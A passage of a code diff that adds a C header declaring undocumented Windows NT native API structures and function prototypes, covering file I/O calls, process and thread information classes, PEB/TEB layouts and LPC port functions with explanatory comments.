ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; + + +typedef struct _FILE_OBJECTID_INFORMATION +{ + LONGLONG FileReference; + UCHAR ObjectId[16]; + union { + struct { + UCHAR BirthVolumeId[16]; + UCHAR BirthObjectId[16]; + UCHAR DomainId[16]; + } ; + UCHAR ExtendedInfo[48]; + }; +} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION; + + +typedef struct _FILE_COMPLETION_INFORMATION { + HANDLE Port; + PVOID Key; +} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; + + +typedef struct _FILE_MOVE_CLUSTER_INFORMATION { + ULONG ClusterCount; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; + + +typedef struct _FILE_NETWORK_OPEN_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG FileAttributes; +} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; + + +typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { + ULONG FileAttributes; + ULONG ReparseTag; +} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; + + +typedef struct _FILE_TRACKING_INFORMATION { + HANDLE DestinationFile; + ULONG ObjectInformationLength; + CHAR ObjectInformation[1]; +} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; + + +typedef struct _FILE_REPARSE_POINT_INFORMATION { + LONGLONG FileReference; + ULONG Tag; +} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; + + +typedef struct _FILE_QUOTA_INFORMATION { + ULONG NextEntryOffset; + ULONG SidLength; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER QuotaUsed; + LARGE_INTEGER QuotaThreshold; + LARGE_INTEGER QuotaLimit; + SID Sid; +} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; + + +typedef struct _FILE_ID_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + CCHAR ShortNameLength; + WCHAR ShortName[12]; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION; + + +typedef struct _FILE_ID_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION; + + +typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION { + LARGE_INTEGER ValidDataLength; +} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION; + +typedef struct _FILE_LINK_ENTRY_INFORMATION { + ULONG NextEntryOffset; + LONGLONG ParentFileId; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION; + +typedef struct _FILE_LINKS_INFORMATION { + ULONG BytesNeeded; + ULONG EntriesReturned; + FILE_LINK_ENTRY_INFORMATION Entry; +} FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION; + + + +typedef enum _FSINFOCLASS { + FileFsVolumeInformation = 1, + FileFsLabelInformation, // 2 + FileFsSizeInformation, // 3 + FileFsDeviceInformation, // 4 + FileFsAttributeInformation, // 5 + FileFsControlInformation, // 6 + FileFsFullSizeInformation, // 7 + FileFsObjectIdInformation, // 8 + FileFsDriverPathInformation, // 9 + FileFsMaximumInformation +} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; + + +NTSYSAPI +NTSTATUS +NTAPI +NtCreateFile( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PLARGE_INTEGER AllocationSize, + IN ULONG FileAttributes, + IN ULONG ShareAccess, + IN ULONG CreateDisposition, + IN ULONG CreateOptions, + IN PVOID EaBuffer, + IN ULONG EaLength); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCreateFile( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PLARGE_INTEGER AllocationSize, + IN ULONG FileAttributes, + IN ULONG ShareAccess, + IN ULONG CreateDisposition, + IN ULONG CreateOptions, + IN PVOID EaBuffer, + IN ULONG EaLength); + + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenFile( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG ShareAccess, + IN ULONG OpenOptions + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwOpenFile( + OUT PHANDLE FileHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG ShareAccess, + IN ULONG OpenOptions + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryDirectoryFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass, + IN BOOLEAN ReturnSingleEntry, + IN PUNICODE_STRING FileName OPTIONAL, + IN BOOLEAN RestartScan + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryDirectoryFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass, + IN BOOLEAN ReturnSingleEntry, + IN PUNICODE_STRING FileName OPTIONAL, + IN BOOLEAN RestartScan + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryVolumeInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FsInformation, + IN ULONG Length, + IN FS_INFORMATION_CLASS FsInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryVolumeInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID FsInformation, + IN ULONG Length, + IN FS_INFORMATION_CLASS FsInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwSetInformationFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID FileInformation, + IN ULONG Length, + IN FILE_INFORMATION_CLASS FileInformationClass + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryEaFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN PVOID EaList OPTIONAL, + IN ULONG EaListLength, + IN PULONG EaIndex OPTIONAL, + IN BOOLEAN RestartScan); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwQueryEaFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN BOOLEAN ReturnSingleEntry, + IN PVOID EaList OPTIONAL, + IN ULONG EaListLength, + IN PULONG EaIndex OPTIONAL, + IN BOOLEAN RestartScan); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetEaFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwSetEaFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length); + + +NTSYSAPI +NTSTATUS +NTAPI +NtReadFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwReadFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + OUT PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtWriteFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwWriteFile( + IN HANDLE FileHandle, + IN HANDLE Event OPTIONAL, + IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, + IN PVOID ApcContext OPTIONAL, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN PVOID Buffer, + IN ULONG Length, + IN PLARGE_INTEGER ByteOffset OPTIONAL, + IN PULONG Key OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDeleteFile( + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwDeleteFile( + IN POBJECT_ATTRIBUTES ObjectAttributes + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtFlushBuffersFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwFlushBuffersFile( + IN HANDLE FileHandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtDeviceIoControlFile( + IN HANDLE FileHandle, + IN HANDLE Event, + IN PIO_APC_ROUTINE ApcRoutine, + IN PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG IoControlCode, + IN PVOID InputBuffer, + IN ULONG InputBufferLength, + IN PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwDeviceIoControlFile( + IN HANDLE FileHandle, + IN HANDLE Event, + IN PIO_APC_ROUTINE ApcRoutine, + IN PVOID ApcContext, + OUT PIO_STATUS_BLOCK IoStatusBlock, + IN ULONG IoControlCode, + IN PVOID InputBuffer, + IN ULONG InputBufferLength, + IN PVOID OutputBuffer, + IN ULONG OutputBufferLength + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtCancelIoFile( + IN HANDLE Filehandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCancelIoFile( + IN HANDLE Filehandle, + OUT PIO_STATUS_BLOCK IoStatusBlock + ); + + +NTSYSAPI +BOOLEAN +NTAPI +RtlDosPathNameToNtPathName_U ( + IN PWSTR DosPathName, + OUT PUNICODE_STRING NtPathName, + OUT PWSTR * NtFileNamePart OPTIONAL, + OUT PCURDIR DirectoryInfo OPTIONAL + ); + + +//----------------------------------------------------------------------------- +// Process functions + +#define GDI_HANDLE_BUFFER_SIZE 34 + +// +// Process Information Classes +// + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation, + ProcessQuotaLimits, + ProcessIoCounters, + ProcessVmCounters, + ProcessTimes, + ProcessBasePriority, + ProcessRaisePriority, + ProcessDebugPort, + ProcessExceptionPort, + ProcessAccessToken, + ProcessLdtInformation, + ProcessLdtSize, + ProcessDefaultHardErrorMode, + ProcessIoPortHandlers, // Note: this is kernel mode only + ProcessPooledUsageAndLimits, + ProcessWorkingSetWatch, + ProcessUserModeIOPL, + ProcessEnableAlignmentFaultFixup, + ProcessPriorityClass, + ProcessWx86Information, + ProcessHandleCount, + ProcessAffinityMask, + ProcessPriorityBoost, + ProcessDeviceMap, + ProcessSessionInformation, + ProcessForegroundInformation, + ProcessWow64Information, + ProcessImageFileName, + ProcessLUIDDeviceMapsEnabled, + ProcessBreakOnTermination, + ProcessDebugObjectHandle, + ProcessDebugFlags, + ProcessHandleTracing, + MaxProcessInfoClass // MaxProcessInfoClass should always be the last enum +} PROCESSINFOCLASS; + +// +// Thread Information Classes +// + +typedef enum _THREADINFOCLASS { + ThreadBasicInformation, // ?? + ThreadTimes, + ThreadPriority, // ?? + ThreadBasePriority, // ?? + ThreadAffinityMask, // ?? + ThreadImpersonationToken, // HANDLE + ThreadDescriptorTableEntry, // ULONG Selector + LDT_ENTRY + ThreadEnableAlignmentFaultFixup, // ?? + ThreadEventPair, // ?? + ThreadQuerySetWin32StartAddress, // ?? + ThreadZeroTlsCell, // ?? + ThreadPerformanceCount, // ?? + ThreadAmILastThread, // ?? + ThreadIdealProcessor, // ?? + ThreadPriorityBoost, // ?? + ThreadSetTlsArrayAddress, // ?? + MaxThreadInfoClass +} THREADINFOCLASS; + + +typedef struct _RTL_DRIVE_LETTER_CURDIR +{ + USHORT Flags; + USHORT Length; + ULONG TimeStamp; + STRING DosPath; + +} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; + + +typedef struct _RTL_USER_PROCESS_PARAMETERS +{ + ULONG MaximumLength; // Should be set before call RtlCreateProcessParameters + ULONG Length; // Length of valid structure + ULONG Flags; // Currently only PPF_NORMALIZED (1) is known: + // - Means that structure is normalized by call RtlNormalizeProcessParameters + ULONG DebugFlags; + + PVOID ConsoleHandle; // HWND to console window associated with process (if any). + ULONG ConsoleFlags; + HANDLE StandardInput; + HANDLE StandardOutput; + HANDLE StandardError; + + CURDIR CurrentDirectory; // Specified in DOS-like symbolic link path, ex: "C:/WinNT/SYSTEM32" + UNICODE_STRING DllPath; // DOS-like paths separated by ';' where system should search for DLL files. + UNICODE_STRING ImagePathName; // Full path in DOS-like format to process'es file image. + UNICODE_STRING CommandLine; // Command line + PVOID Environment; // Pointer to environment block (see RtlCreateEnvironment) + ULONG StartingX; + ULONG StartingY; + ULONG CountX; + ULONG CountY; + ULONG CountCharsX; + ULONG CountCharsY; + ULONG FillAttribute; // Fill attribute for console window + ULONG WindowFlags; + ULONG ShowWindowFlags; + UNICODE_STRING WindowTitle; + UNICODE_STRING DesktopInfo; // Name of WindowStation and Desktop objects, where process is assigned + UNICODE_STRING ShellInfo; + UNICODE_STRING RuntimeData; + RTL_DRIVE_LETTER_CURDIR CurrentDirectores[0x20]; + +} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; + +// +// Process Environment Block +// + +typedef struct _PEB_FREE_BLOCK +{ + struct _PEB_FREE_BLOCK *Next; + ULONG Size; + +} PEB_FREE_BLOCK, *PPEB_FREE_BLOCK; + + +typedef struct _PEB_LDR_DATA +{ + ULONG Length; + BOOLEAN Initialized; + HANDLE SsHandle; + LIST_ENTRY InLoadOrderModuleList; // Points to the loaded modules (main EXE usually) + LIST_ENTRY InMemoryOrderModuleList; // Points to all modules (EXE and all DLLs) + LIST_ENTRY InInitializationOrderModuleList; + PVOID EntryInProgress; + +} PEB_LDR_DATA, *PPEB_LDR_DATA; + + +typedef struct _LDR_DATA_TABLE_ENTRY +{ + LIST_ENTRY InLoadOrderLinks; + LIST_ENTRY InMemoryOrderLinks; + LIST_ENTRY InInitializationOrderLinks; + PVOID DllBase; // Base address of the module + PVOID EntryPoint; + ULONG SizeOfImage; + UNICODE_STRING FullDllName; + UNICODE_STRING BaseDllName; + ULONG Flags; + USHORT LoadCount; + USHORT TlsIndex; + LIST_ENTRY HashLinks; + PVOID SectionPointer; + ULONG CheckSum; + ULONG TimeDateStamp; + PVOID LoadedImports; + PVOID EntryPointActivationContext; + PVOID PatchInformation; + PVOID Unknown1; + PVOID Unknown2; + PVOID Unknown3; + +} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; + + +typedef struct _PEB +{ + BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the + BOOLEAN ReadImageFileExecOptions; // + BOOLEAN BeingDebugged; // + BOOLEAN BitField; // reserved for bitfields with system-specific flags + + HANDLE Mutant; // INITIAL_PEB structure is also updated. + + PVOID ImageBaseAddress; + PPEB_LDR_DATA Ldr; + PRTL_USER_PROCESS_PARAMETERS ProcessParameters; + PVOID SubSystemData; + PVOID ProcessHeap; + PRTL_CRITICAL_SECTION FastPebLock; + + PSLIST_HEADER AtlThunkSListPtr; + PVOID IFEOKey; + ULONG CrossProcessFlags; + union { + PVOID KernelCallbackTable; + PVOID UserSharedInfoPtr; + }; + + DWORD SystemReserved; + DWORD AtlThunkSListPtr32; + PVOID ApiSetMap; + + PVOID TlsExpansionCounter; + PVOID TlsBitmap; + DWORD TlsBitmapBits[2]; // relates to TLS_MINIMUM_AVAILABLE + + PVOID ReadOnlySharedMemoryBase; + PVOID SharedData; + PVOID *ReadOnlyStaticServerData; + PVOID AnsiCodePageData; + PVOID OemCodePageData; + PVOID UnicodeCaseTableData; + + // + // Useful information for LdrpInitialize + + ULONG NumberOfProcessors; + ULONG NtGlobalFlag; + + // + // Passed up from MmCreatePeb from Session Manager registry key + // + + LARGE_INTEGER CriticalSectionTimeout; + PVOID HeapSegmentReserve; + PVOID HeapSegmentCommit; + PVOID HeapDeCommitTotalFreeThreshold; + PVOID HeapDeCommitFreeBlockThreshold; + + // + // Where heap manager keeps track of all heaps created for a process + // Fields initialized by MmCreatePeb. ProcessHeaps is initialized + // to point to the first free byte after the PEB and MaximumNumberOfHeaps + // is computed from the page size used to hold the PEB, less the fixed + // size of this data structure. + // + + DWORD NumberOfHeaps; + DWORD MaximumNumberOfHeaps; + PVOID *ProcessHeaps; + + // + // + PVOID GdiSharedHandleTable; + PVOID ProcessStarterHelper; + PVOID GdiDCAttributeList; + PRTL_CRITICAL_SECTION LoaderLock; + + // + // Following fields filled in by MmCreatePeb from system values and/or + // image header. These fields have changed since Windows NT 4.0, + // so use with caution + // + + DWORD OSMajorVersion; + DWORD OSMinorVersion; + USHORT OSBuildNumber; + USHORT OSCSDVersion; + DWORD OSPlatformId; + DWORD ImageSubsystem; + DWORD ImageSubsystemMajorVersion; + + PVOID ImageSubsystemMinorVersion; + PVOID ImageProcessAffinityMask; + PVOID GdiHandleBuffer[GDI_HANDLE_BUFFER_SIZE]; + + // [...] - more fields are there: this is just a fragment of the PEB structure +} PEB, *PPEB; + + +// +// Thread environment block +// + +typedef struct _TEB +{ + NT_TIB NtTib; + PVOID EnvironmentPointer; + CLIENT_ID ClientId; + PVOID ActiveRpcHandle; + PVOID ThreadLocalStoragePointer; + PPEB ProcessEnvironmentBlock; + ULONG LastErrorValue; + ULONG CountOfOwnedCriticalSections; + PVOID CsrClientThread; + PVOID Win32ThreadInfo; + // Incomplete + +} TEB, *PTEB; + + +typedef struct _PROCESS_BASIC_INFORMATION +{ + NTSTATUS ExitStatus; + PPEB PebBaseAddress; + ULONG_PTR AffinityMask; + KPRIORITY BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; + +} PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION; + + + +#define NtCurrentProcess() ((HANDLE) -1) +#define NtCurrentThread() ((HANDLE) -2) + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenProcess ( + OUT PHANDLE ProcessHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN PCLIENT_ID ClientId OPTIONAL + ); + +NTSYSCALLAPI + NTSTATUS + NTAPI + NtSuspendProcess( + IN HANDLE ProcessHandle + ); + +NTSYSCALLAPI + NTSTATUS + NTAPI + NtResumeProcess( + IN HANDLE ProcessHandle + ); + +NTSYSAPI +NTSTATUS +NTAPI +NtOpenThread ( + OUT PHANDLE ThreadHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN PCLIENT_ID ClientId OPTIONAL + ); + +NTSYSAPI + NTSTATUS + NTAPI + NtQueryInformationThread( + IN HANDLE ThreadHandle, + IN THREADINFOCLASS ThreadInformationClass, + OUT PVOID ThreadInformation, + IN ULONG ThreadInformationLength, + OUT PULONG ReturnLength OPTIONAL + ); + +NTSYSAPI +NTSTATUS +NTAPI +NtQueryInformationProcess( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + OUT PVOID ProcessInformation, + IN ULONG ProcessInformationLength, + OUT PULONG ReturnLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +NtSetInformationProcess ( + IN HANDLE ProcessHandle, + IN PROCESSINFOCLASS ProcessInformationClass, + IN PVOID ProcessInformation, + IN ULONG ProcessInformationLength + ); + +//------------------------------------------------------------------------------ +// LPC Functions + +#define MAX_LPC_DATA 0x130 // Maximum number of bytes that can be copied through LPC + +// LPC connection types +typedef enum _LPC_TYPE +{ + LPC_NEW_MESSAGE, // (0) A new message + LPC_REQUEST, // (1) A request message + LPC_REPLY, // (2) A reply to a request message + LPC_DATAGRAM, // (3) + LPC_LOST_REPLY, // (4) + LPC_PORT_CLOSED, // (5) Send when port is deleted + LPC_CLIENT_DIED, // (6) Messages to thread termination ports + LPC_EXCEPTION, // (7) Messages to thread exception ports + LPC_DEBUG_EVENT, // (8) Messages to thread debug port + LPC_ERROR_EVENT, // (9) Used by NtRaiseHardError + LPC_CONNECTION_REQUEST // (A) Used by NtConnectPort + +} LPC_TYPE, *PLPC_TYPE; + +// +// Define header for Port Message +// + +typedef struct _PORT_MESSAGE +{ + USHORT DataLength; // Length of data following the header (bytes) + USHORT TotalLength; // Length of data + sizeof(PORT_MESSAGE) + USHORT Type; // Type of the message (See LPC_TYPE enum) + USHORT VirtualRangesOffset; // Offset of array of virtual address ranges + CLIENT_ID ClientId; // Client identifier of the message sender + ULONG MessageId; // Identifier of the particular message instance + union + { + ULONG CallbackId; // + ULONG ClientViewSize; // Size, in bytes, of section created by the sender + }; + +} PORT_MESSAGE, *PPORT_MESSAGE; + +// +// Define structure for initializing shared memory on the caller's side of the port +// + +typedef struct _PORT_VIEW { + + ULONG Length; // Size of this structure + HANDLE SectionHandle; // Handle to section object with + // SECTION_MAP_WRITE and SECTION_MAP_READ + ULONG SectionOffset; // The offset in the section to map a view for + // the port data area. The offset must be aligned + // with the allocation granularity of the system. + ULONG ViewSize; // The size of the view (in bytes) + PVOID ViewBase; // The base address of the view in the creator + // + PVOID ViewRemoteBase; // The base address of the view in the process + // connected to the port. +} PORT_VIEW, *PPORT_VIEW; + +// +// Define structure for shared memory coming from remote side of the port +// + +typedef struct _REMOTE_PORT_VIEW { + + ULONG Length; // Size of this structure + ULONG ViewSize; // The size of the view (bytes) + PVOID ViewBase; // Base address of the view + +} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW; + +/*++ + + NtCreatePort + ============ + + Creates a LPC port object. The creator of the LPC port becomes a server + of LPC communication + + PortHandle - Points to a variable that will receive the + port object handle if the call is successful. + + ObjectAttributes - Points to a structure that specifies the object s + attributes. OBJ_KERNEL_HANDLE, OBJ_OPENLINK, OBJ_OPENIF, OBJ_EXCLUSIVE, + OBJ_PERMANENT, and OBJ_INHERIT are not valid attributes for a port object. + + MaxConnectionInfoLength - The maximum size, in bytes, of data that can + be sent through the port. + + MaxMessageLength - The maximum size, in bytes, of a message + that can be sent through the port. + + MaxPoolUsage - Specifies the maximum amount of NonPaged pool that can be used for + message storage. Zero means default value. + + ZwCreatePort verifies that (MaxDataSize <= 0x104) and (MaxMessageSize <= 0x148). + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtCreatePort( + OUT PHANDLE PortHandle, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN ULONG MaxConnectionInfoLength, + IN ULONG MaxMessageLength, + IN ULONG MaxPoolUsage + ); + + +/*++ + + NtConnectPort + ============= + + Creates a port connected to a named port (cliend side). + + PortHandle - A pointer to a variable that will receive the client + communication port object handle value. + + PortName - Points to a structure that specifies the name + of the port to connect to. + + SecurityQos - Points to a structure that specifies the level + of impersonation available to the port listener. + + ClientView - Optionally points to a structure describing + the shared memory region used to send large amounts of data + to the listener; if the call is successful, this will be updated. + + ServerView - Optionally points to a caller-allocated buffer + or variable that receives information on the shared memory region + used by the listener to send large amounts of data to the + caller. + + MaxMessageLength - Optionally points to a variable that receives the size, + in bytes, of the largest message that can be sent through the port. + + ConnectionInformation - Optionally points to a caller-allocated + buffer or variable that specifies connect data to send to the listener, + and receives connect data sent by the listener. + + ConnectionInformationLength - Optionally points to a variable that + specifies the size, in bytes, of the connect data to send + to the listener, and receives the size of the connect data + sent by the listener. + +--*/ + +NTSYSAPI +NTSTATUS +NTAPI +NtConnectPort( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT PPORT_VIEW ClientView OPTIONAL, + OUT PREMOTE_PORT_VIEW ServerView OPTIONAL, + OUT PULONG MaxMessageLength OPTIONAL, + IN OUT PVOID ConnectionInformation OPTIONAL, + IN OUT PULONG ConnectionInformationLength OPTIONAL + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwConnectPort( + OUT PHANDLE PortHandle, + IN PUNICODE_STRING PortName, + IN PSECURITY_QUALITY_OF_SERVICE SecurityQos, + IN OUT PPORT_VIEW ClientView OPTIONAL, + OUT PREMOTE_PORT_VIEW ServerView OPTIONAL, + OUT PULONG MaxMessageLength OPTIONAL, + IN OUT PVOID ConnectionInformation OPTIONAL, + IN OUT PULONG ConnectionInformationLength OPTIONAL + ); + + +/*++ + + NtListenPort + ============ + + Listens on a port for a connection request message on the server side. + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + + ConnectionRequest - Points to a caller-allocated buffer + or variable that receives the connect message sent to + the port. + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtListenPort( + IN HANDLE PortHandle, + OUT PPORT_MESSAGE RequestMessage + ); + +/*++ + + NtAcceptConnectPort + =================== + + Accepts or rejects a connection request on the server side. + + PortHandle - Points to a variable that will receive the port object + handle if the call is successful. + + PortContext - A numeric identifier to be associated with the port. + + ConnectionRequest - Points to a caller-allocated buffer or variable + that identifies the connection request and contains any connect + data that should be returned to requestor of the connection + + AcceptConnection - Specifies whether the connection should + be accepted or not + + ServerView - Optionally points to a structure describing + the shared memory region used to send large amounts of data to the + requestor; if the call is successful, this will be updated + + ClientView - Optionally points to a caller-allocated buffer + or variable that receives information on the shared memory + region used by the requestor to send large amounts of data to the + caller + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtAcceptConnectPort( + OUT PHANDLE PortHandle, + IN PVOID PortContext OPTIONAL, + IN PPORT_MESSAGE ConnectionRequest, + IN BOOLEAN AcceptConnection, + IN OUT PPORT_VIEW ServerView OPTIONAL, + OUT PREMOTE_PORT_VIEW ClientView OPTIONAL + ); + +/*++ + + NtCompleteConnectPort + ===================== + + Completes the port connection process on the server side. + + PortHandle - A handle to a port object. The handle doesn't need + to grant any specific access. + +--*/ + + +NTSYSAPI +NTSTATUS +NTAPI +NtCompleteConnectPort( + IN HANDLE PortHandle + ); + + +NTSYSAPI +NTSTATUS +NTAPI +ZwCompleteConnectPort( + IN HANDLE PortHandle + ); + + +/*++ + + NtRequestPort + ============= + + Sends a request message to a port (client side) + + PortHandle - A handle to a port object. The handle doesn't need + to grant 